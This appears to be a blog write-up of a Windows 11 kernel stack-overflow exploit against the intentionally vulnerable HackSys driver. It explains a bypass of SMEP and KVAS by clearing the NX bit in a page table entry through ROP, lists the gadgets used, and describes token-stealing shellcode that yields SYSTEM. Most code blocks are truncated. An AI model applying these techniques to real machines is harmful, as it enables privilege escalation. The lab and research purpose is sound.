Exploiting a kernel stack overflow in Windows 11?
Environment Setup
OS: Windows 11 22000.556 VM
HackSysExtremeVulnerableDriver 3.0
Articles on setting up remote kernel debugging and loading the driver can be easily found online, so I’ll skip that part and focus on the technical details.
Introduction
Since the driver is intentionally vulnerable, there is almost no reverse engineering needed to locate the bug, hence no point writing that part too.
Essentially there is a kernel stack based buffer overflow bug, and we can control RIP
at offset 2072
by sending a buffer with ioctl code 0x222003
.
First 0x4141414141414141
We’ll start by writing a base code to trigger the vulnerability and control RIP
.
1 |
|
1 | Access violation - code c0000005 (!!! second chance !!!) |
Running the POC gives us a crash, where we can control RIP
reliably.
Theory
From here we have a few options.
We can either attempt to gain shellcode execution, or try to achieve our goals by pure ROP(data only attack).
Since vanilla stack overflow is a rather powerful primitive, I’m more interested to find out if full shellcode execution is possible.
However, the year is 2022 and we are on Windows 11. Even the default installation has tons of mitigations present(SMEP, KASLR, KVAS etc). We definitely have to bypass them in order to get a chance to execute code.
SMEP
Supervisor Mode Execution Prevention is enabled by setting the 20th bit of the CR4
register as shown below.
1 | 0: kd> r cr4 |
This means any attempt to execute user mode memory while in kernel mode will raise an exception and eventually cause a BSOD.
KASLR
Addresses of ntoskrnl.exe
exports and other datastructures are randomized on boot. This is pretty useless from a LPE standpoint, since any medium integrity process can query the system to view export addresses.
KVAS
Kernel Virtual Address Shadow is Windows’ implementation of KPTI
. It also implements software based SMEP
, which marks user pages as NX regardless of the bits in CR4
.
With these in mind, we can start thinking of the bypasses.
Bypassing KASLR
is simple. We use documented API EnumDeviceDrivers
to get the base address of nt
. From there we can calculate the addresses of symbols at runtime.
SMEP
however is more difficult to deal with. For starters, we can’t just use ROP to modify CR4
, because software based SMEP
does not care about that.
Instead, we will have to turn our stack overflow into an arbitrary write primitive, and corrupt some important structures.
PTE
The Page Table Entry is part of the paging structure used by Windows. More details can be found online easily. The important part is that PTE is responsible for indicating whether a page is executable or not.
It is of type MMPTE_HARDWARE
1 | 0: kd> !pte 0xFFFFF78000000000 |
As shown above, we inspect the PTE
of a static section KUSER_SHARED_DATA
.
This is a writeable page in kernel space, always mapped to the same address 0xFFFFF78000000000
.
The NX bit is the highest bit. This means if we clear the most significant byte at the PTE
of KUSER_SHARED_DATA
, we can make the section executable.
1 | 0: kd> ? 0y0000000000000000000000000000000000000100001100110001100101100011 |
Since the actual important data is only around the first 0x700
bytes of KUSER_SHARED_DATA
while pages are 0x1000
bytes, we are free to write anything at around KUSER_SHARED_DATA+0x800
.
Now we have a general plan.
- Use ROP to disable NX
- Copy shellcode to KUSER_SHARED_DATA+0x800
- Jump to shellcode
Gadget hunting
As far as I’m familiar with, there are two easy ways to find gadgets in kernel land.
Use a tool like
rp++
againstC:\Windows\System32\ntoskrnl.exe
Use WinDbg’s search function.
For short gadgets(one instruction before ret), I usually do it in WinDbg directly.
For example, if I’m looking for a pop r14; pop r15; ret;
gadget, I’ll do as shown below:
1 | 0: kd> lm m nt |
The arbitrary write gadgets I’ll use revolves around RAX
and RCX
, since they are the most commonly found registers.
Of course we need:
pop rax; ret;
pop rcx; ret;
Next I used:
mov qword ptr [rax], rcx; ret;
for arbitrary write.
Finally:
add rax, qword ptr [rcx]; ret;
mov byte ptr [rax], rcx; ret;
to manipulate the PTE
. We’ll see how it’s done shortly.
PTE Manipulation
Before we can clear the most significant byte of KUSER_SHARED_DATA
‘s PTE
, we have to locate it in memory.
Windows has a kernel API to do that, nt!MiGetPteAddress
1 | 0: kd> u nt!MiGetPteAddress |
As per __fastcall
convention, RCX
holds the first argument passed to this function, which is the address mapped by the PTE
.
So if we want to find the PTE
of address X, we do ( (X >> 9) & 0x7ffffffff8 ) + PTE_BASE
PTE_BASE is affected by KASLR
, but we can dynamically locate it at nt!MiGetPteAddress+0x13
1 | 0: kd> dq nt!MiGetPteAddress+0x13 L1 |
Hence, we first feed the (X >> 9) & 0x7ffffffff8 part into RAX
, and point RCX
to nt!MiGetPteAddress+0x13
Then we can use gadget 4 to compute the PTE
address, before using gadget 5 to clear the most significant byte.
The code will look like this:
1 |
|
Shellcoding
Kernel shellcode is rather simple and does not require us to resolve any addresses.
Extensive documentation can be found online, so I’ll just talk about the parts I modified.
1 | // rax contains pid of spawned cmd |
Firstly, the offset to the ActiveProcessLinks
and Token
changed from Windows 10 to Windows 11, so it’s important to find it with WinDbg.
At the end of the shellcode, I inserted an infinite loop, because I found proper kernel recovery extremely difficult. I could have used nt!KiDelayExecutionThread
as a cleaner way to suspend the thread, but that led to a crash very quickly, possibly due to resource locking.
Since the current thread will be spinning forever, I can’t just copy the privileged token to the current process. Instead I’ll pass the PID of a new process in RAX
, and relay the token to it.
Some people prefer to clear the refcount of the token, but I found it to be pointless because 1. the refcount is not really strictly controlled, as inferred from ReactOS’s source code(if refcount==1, bring it back to maximum again), and 2. it’s just a fast refcount, even if it runs out, a slow path will be taken and things still work just fine.
To convert assembly to shellcode, I simply used an online assembler and python.
1 | def make(s): |
Final Exploit
1 |
|
system!
Conclusion
Feels amazing to finally do some research related to the Windows Kernel, a dream target of mine to hack. However I do need to learn to perform proper kernel recovery, because incorrectly letting the thread spin wastes a lot of CPU and might cause system instability. Recently bought the Windows Kernel Programming 2nd Edition book, and hopefully I’ll learn more about Windows Internals. Looking forward to many more blog posts on Windows Kernel :)